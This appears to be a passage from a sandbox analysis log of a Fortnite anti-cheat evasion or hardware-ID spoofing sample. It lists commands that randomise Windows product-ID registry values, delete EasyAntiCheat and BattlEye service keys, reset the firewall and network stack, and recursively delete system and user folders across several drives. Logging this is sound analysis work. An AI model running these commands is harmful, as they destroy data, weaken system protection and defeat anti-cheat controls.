    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:1644
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId /t REG_BINARY /d 2420819633226223150810734245448252316123056 /f
      4⤵
      PID:1508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId4 /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:1540
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId4 /t REG_BINARY /d 2420819633226223150810734245448252316123056 /f
      4⤵
      PID:1868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d %random%%random%%random% /f
    3⤵
    PID:2880
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d 242081963322622 /f
      4⤵
      Modifies registry key
      PID:220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d %random%%random%%random% /f
    3⤵
    PID:3048
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d 242081963322622 /f
      4⤵
      PID:2424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d %random%%random%%random% /f
    3⤵
    PID:2576
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d 242081963322622 /f
      4⤵
      PID:1480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SevilleEventlogManager /v LastEventlogWrittenTime /t REG_QWORD /d %random%%random%%random% /f
    3⤵
    PID:1664
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SevilleEventlogManager /v LastEventlogWrittenTime /t REG_QWORD /d 242081963322622 /f
      4⤵
      PID:2608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Control\Notifications /v 418A073AA3BC8075 /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:836
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\System\CurrentControlSet\Control\Notifications /v 418A073AA3BC8075 /t REG_BINARY /d 2420819633226223150810734245448252316123056200722360324873 /f
      4⤵
      PID:2440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Kernel-EventTracing/Admin /v OwningPublisher /t REG_SZ /d {%random%-%random%-%random%%random%} /f
    3⤵
    PID:2040
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Kernel-EventTracing/Admin /v OwningPublisher /t REG_SZ /d {24208-19633-2262231508} /f
      4⤵
      PID:2984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\WOW6432Node\EasyAntiCheat /f
    3⤵
    PID:2476
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\WOW6432Node\EasyAntiCheat /f
      4⤵
      PID:2420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
    3⤵
    PID:872
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
      4⤵
      Modifies registry key
      PID:1764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f
    3⤵
    PID:1488
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f
      4⤵
      PID:2224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh winsock reset
    3⤵
    PID:2388
  - - C:\Windows\system32\netsh.exe
      netsh winsock reset
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      PID:1736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh winsock reset catalog
    3⤵
    PID:2896
  - - C:\Windows\system32\netsh.exe
      netsh winsock reset catalog
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      PID:1056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh int ip reset
    3⤵
    PID:2036
  - - C:\Windows\system32\netsh.exe
      netsh int ip reset
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      PID:2964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall reset
    3⤵
    PID:1100
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall reset
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:3004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh int reset all
    3⤵
    PID:1548
  - - C:\Windows\system32\netsh.exe
      netsh int reset all
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      PID:572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh int ipv4 reset
    3⤵
    PID:1108
  - - C:\Windows\system32\netsh.exe
      netsh int ipv4 reset
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      PID:988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh int ipv6 reset
    3⤵
    PID:292
  - - C:\Windows\system32\netsh.exe
      netsh int ipv6 reset
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      PID:2888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ipconfig /release
    3⤵
    PID:204
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /release
      4⤵
      Gathers network information
      PID:2584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ipconfig /renew
    3⤵
    PID:1508
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /renew
      4⤵
      Gathers network information
      PID:1644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ipconfig /flushdns
    3⤵
    PID:2396
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /flushdns
      4⤵
      Gathers network information
      PID:2096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Roaming\Microsoft\Windows\CloudStore
    3⤵
    PID:200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\FortniteGame\Saved
    3⤵
    PID:212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\INF
    3⤵
    - Drops file in Windows directory
    PID:220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\ProgramData\%username%\Microsoft\XboxLive\NSALCache
    3⤵
    PID:2880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\Public\Documents
    3⤵
    PID:2244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\Prefetch
    3⤵
    PID:1960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\D3DSCache
    3⤵
    PID:1164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\CrashReportClient
    3⤵
    PID:2428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\temp
    3⤵
    PID:2668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Microsoft\Windows\SettingSync\metastore
    3⤵
    PID:1660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\SoftwareDistribution\DataStore\Logs
    3⤵
    PID:616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\ProgramData\Microsoft\Windows\WER\Temp
    3⤵
    PID:2576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\AMD\DxCache
    3⤵
    PID:2608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "C:\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:1664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\Prefetch
    3⤵
    PID:2188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q C:\Users\username%\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\*.*
    3⤵
    PID:1836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q C:\Users\%username%\AppData\Local\Microsoft\Windows\WebCache\*.*
    3⤵
    PID:2692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC
    3⤵
    PID:1616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalCache
    3⤵
    PID:1036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings
    3⤵
    PID:2092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "C:\Program Files\Epic Games\Fortnite\Engine\Plugins
    3⤵
    PID:2128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "C:\Program Files\Epic Games\Fortnite\FortniteGame\Plugins
    3⤵
    PID:448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "C:\Program Files\Epic Games\Fortnite\FortniteGame\PersistentDownloadDir
    3⤵
    PID:1780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "C:\Program Files\Epic Games\Fortnite\FortniteGame\Config
    3⤵
    PID:2656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "C:\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:2548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:2728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q C:\ProgramData\Microsoft\DataMart\PaidWiFi\NetworksCache
    3⤵
    PID:1584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q C:\ProgramData\Microsoft\DataMart\PaidWiFi\Rules
    3⤵
    PID:1764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Cache
    3⤵
    PID:872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Temp
    3⤵
    PID:2224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache
    3⤵
    PID:1488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies
    3⤵
    PID:2644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\AppData\Local\Microsoft\Windows\History
    3⤵
    PID:2500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Users\%username%\Intel
    3⤵
    PID:3052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
    3⤵
    PID:2076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "C:\Users\%username%\AppData\Local\Microsoft\Feeds Cache
    3⤵
    PID:2328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Roaming\Microsoft\Windows\CloudStore
    3⤵
    PID:2916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\FortniteGame\Saved
    3⤵
    PID:2752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Windows\INF
    3⤵
    PID:2072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\ProgramData\%username%\Microsoft\XboxLive\NSALCache
    3⤵
    PID:2364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\Public\Documents
    3⤵
    PID:2988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Windows\Prefetch
    3⤵
    PID:2168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\D3DSCache
    3⤵
    PID:2720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\CrashReportClient
    3⤵
    PID:2820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Windows\temp
    3⤵
    PID:3020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\Microsoft\Windows\SettingSync\metastore
    3⤵
    PID:2980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Windows\SoftwareDistribution\DataStore\Logs
    3⤵
    PID:2284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\ProgramData\Microsoft\Windows\WER\Temp
    3⤵
    PID:2792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\AMD\DxCache
    3⤵
    PID:1448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "D:\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:2504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Windows\Prefetch
    3⤵
    PID:876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q D:\Users\username%\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\*.*
    3⤵
    PID:1996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q D:\Users\%username%\AppData\Local\Microsoft\Windows\WebCache\*.*
    3⤵
    PID:2432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC
    3⤵
    PID:2740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalCache
    3⤵
    PID:796
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings
    3⤵
    PID:2452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "D:\Program Files\Epic Games\Fortnite\Engine\Plugins
    3⤵
    PID:2700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "D:\Program Files\Epic Games\Fortnite\FortniteGame\Plugins
    3⤵
    PID:2056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "D:\Program Files\Epic Games\Fortnite\FortniteGame\PersistentDownloadDir
    3⤵
    PID:2336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "D:\Program Files\Epic Games\Fortnite\FortniteGame\Config
    3⤵
    PID:3012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "D:\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:1736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:2388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q D:\ProgramData\Microsoft\DataMart\PaidWiFi\NetworksCache
    3⤵
    PID:1172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q D:\ProgramData\Microsoft\DataMart\PaidWiFi\Rules
    3⤵
    PID:1676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Cache
    3⤵
    PID:1984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\Temp
    3⤵
    PID:2572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache
    3⤵
    PID:2292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies
    3⤵
    PID:2108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\AppData\Local\Microsoft\Windows\History
    3⤵
    PID:2404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Users\%username%\Intel
    3⤵
    PID:1624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q D:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
    3⤵
    PID:1352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "D:\Users\%username%\AppData\Local\Microsoft\Feeds Cache
    3⤵
    PID:2368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Roaming\Microsoft\Windows\CloudStore
    3⤵
    PID:2784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\FortniteGame\Saved
    3⤵
    PID:832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Windows\INF
    3⤵
    PID:1088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\ProgramData\%username%\Microsoft\XboxLive\NSALCache
    3⤵
    PID:2704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\Public\Documents
    3⤵
    PID:772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Windows\Prefetch
    3⤵
    PID:2288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\D3DSCache
    3⤵
    PID:2632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\CrashReportClient
    3⤵
    PID:2000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Windows\temp
    3⤵
    PID:208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\Microsoft\Windows\SettingSync\metastore
    3⤵
    PID:2716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Windows\SoftwareDistribution\DataStore\Logs
    3⤵
    PID:2544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\ProgramData\Microsoft\Windows\WER\Temp
    3⤵
    PID:1364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\AMD\DxCache
    3⤵
    PID:2436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "E:\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Windows\Prefetch
    3⤵
    PID:2008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q E:\Users\username%\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\*.*
    3⤵
    PID:328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q E:\Users\%username%\AppData\Local\Microsoft\Windows\WebCache\*.*
    3⤵
    PID:1756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC
    3⤵
    PID:2232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalCache
    3⤵
    PID:2184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings
    3⤵
    PID:2960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "E:\Program Files\Epic Games\Fortnite\Engine\Plugins
    3⤵
    PID:1228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "E:\Program Files\Epic Games\Fortnite\FortniteGame\Plugins
    3⤵
    PID:2212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "E:\Program Files\Epic Games\Fortnite\FortniteGame\PersistentDownloadDir
    3⤵
    PID:2888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "E:\Program Files\Epic Games\Fortnite\FortniteGame\Config
    3⤵
    PID:292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "E:\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:1948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q E:\ProgramData\Microsoft\DataMart\PaidWiFi\NetworksCache
    3⤵
    PID:1868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /f /s /q E:\ProgramData\Microsoft\DataMart\PaidWiFi\Rules
    3⤵
    PID:1644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Cache
    3⤵
    PID:1508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\Temp
    3⤵
    PID:2304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache
    3⤵
    PID:1540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies
    3⤵
    PID:2688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\AppData\Local\Microsoft\Windows\History
    3⤵
    PID:984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Users\%username%\Intel
    3⤵
    PID:224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q E:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
    3⤵
    PID:1532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "E:\Users\%username%\AppData\Local\Microsoft\Feeds Cache
    3⤵
    PID:2424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Roaming\Microsoft\Windows\CloudStore
    3⤵
    PID:3048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Local\FortniteGame\Saved
    3⤵
    PID:1720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Windows\INF
    3⤵
    PID:2416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\ProgramData\%username%\Microsoft\XboxLive\NSALCache
    3⤵
    PID:2480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\Public\Documents
    3⤵
    PID:1480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Windows\Prefetch
    3⤵
    PID:1060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Local\D3DSCache
    3⤵
    PID:1608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Local\CrashReportClient
    3⤵
    PID:2356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Windows\temp
    3⤵
    PID:1528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Local\Microsoft\Windows\SettingSync\metastore
    3⤵
    PID:2532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Windows\SoftwareDistribution\DataStore\Logs
    3⤵
    PID:880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\ProgramData\Microsoft\Windows\WER\Temp
    3⤵
    PID:2492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Users\%username%\AppData\Local\AMD\DxCache
    3⤵
    PID:2440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q "F:\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q F:\Windows\Prefetch
    3⤵
    PID:2984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q F:\Users\username%\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\*.*
    3⤵
    PID:2040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c @del /s /f /a:h / a : a / q F:\Users\%username%\AppData\Local\Microsoft\Windows\WebCache\*.*
    3⤵
    PID:1416
- - C:\Windows\system32\cmd.exe
